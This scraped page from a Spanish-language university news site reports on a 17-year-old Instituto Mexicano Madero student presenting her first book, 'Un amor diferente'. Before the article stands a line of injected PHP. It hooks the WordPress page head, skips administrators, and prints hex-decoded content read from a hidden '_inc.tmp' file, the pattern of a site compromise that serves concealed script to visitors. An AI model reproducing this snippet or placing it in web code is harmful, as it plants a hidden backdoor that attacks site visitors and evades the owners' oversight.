if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Alumna de IMM escribe y publica libro “Un amor diferente” – La Opinión Universitaria La Opinión Universitaria
Menu

Alumna de IMM escribe y publica libro “Un amor diferente”

  

·         La joven estudiante de Bachillerato, dijo sentirse agradecida con la escuela y sus profesores por motivarla a cumplir uno de sus sueños.

San Andrés Cholula, Puebla.- A sus escasos 17 años Yamilé Fabela ya tiene muy claras sus metas de vida y no solo eso, sino que además ha comenzado a trabajar en ellas.

La joven estudiante de Bachillerato del Instituto Mexicano Madero Plantel Zavaleta, pudo concretar uno de sus sueños al publicar su primer libro titulado “Un amor diferente”, mismo que presentó ante autoridades del IMM y de la UMAD, así como docentes, compañeros, amigos y familiares.

Visiblemente emocionada pero con gran elocuencia, Yamilé relató cómo fue el proceso de creación del primero de muchos libros que planea escribir a lo largo de su vida. De esta forma habló de su principal inspiración y motor diario, su madre; y el apoyo que recibió por parte de sus maestros así como de su escuela para animarse a sacar a la luz la obra que inició cuando ella tenía apenas 14 años de edad.

A Yamilé la acompañaron dos personas que admira y considera importantes en su vida, quienes se encargaron de dar la reseña de “Un amor diferente”, Alitzel Molina  y el Ing. Rene Preza, ambos envolvieron a los presentes en la trama del libro explicando las complejidades de los personajes y lo cautivante de la historia.

A nombre del Instituto Mexicano Madero, la Mtra. María Luisa Cuachayo, directora del Plantel Zavaleta, felicitó a la estudiante y a su familia por el logro que significa a tan corta edad haber publicado ya un libro, destacando que Yamilé siempre ha sido una alumna disciplinada y comprometida, pero sobre todo que tiene muy claro lo que quiere.

“Si bien cada uno de los alumnos posee de manera innata sus propias habilidades, talentos y competencias, hay otras características en potencia que hay que ir descubriendo y ese es uno de los objetivos de nuestra institución, ayudarles a que afloren las habilidades de cada uno de nuestros alumnos y concreten sus proyectos.

Del mismo modo, la directora exhortó a los estudiantes que asistieron a la presentación del libro de Yamilé, a buscar nuevos senderos y soluciones, pensar de manera crítica, confiar en ellos mismos y generar ideas nuevas; mientras que a los maestros les pidió seguir siendo un modelo de inspiración en cada uno de sus alumnos y continuar descubriendo y desarrollando todo su potencial.

Finalmente Yamilé señaló que su libro le dio alas para explorar mundos alternos, además de abrirle oportunidades de conocer nuevos lugares, nuevas personas, vivir experiencias que jamás pensó vivir, y poder escribir sobre algunas situaciones que en la vida real fueron muy dolorosas para ella.

“Yo lo que espero de este libro es que pueda llegar a más corazones, que pueda enseñar algo que sea fuente de inspiración para los lectores, para que sigan sus sueños y trabajen por ellos y nada me haría más feliz que alguien salga de aquí con el sueño de escribir y publicar un libro. Me siento muy agradecida con mi escuela por darme la oportunidad de presentarles parte de mi proyecto de vida, es muy importante para mí ya que he estado aquí desde pequeña, es la escuela que me ha visto crecer, con los profesores que siempre me han dado consejos… en resumen, mi segundo hogar”, finalizó la destacada estudiante.

Tweets recientes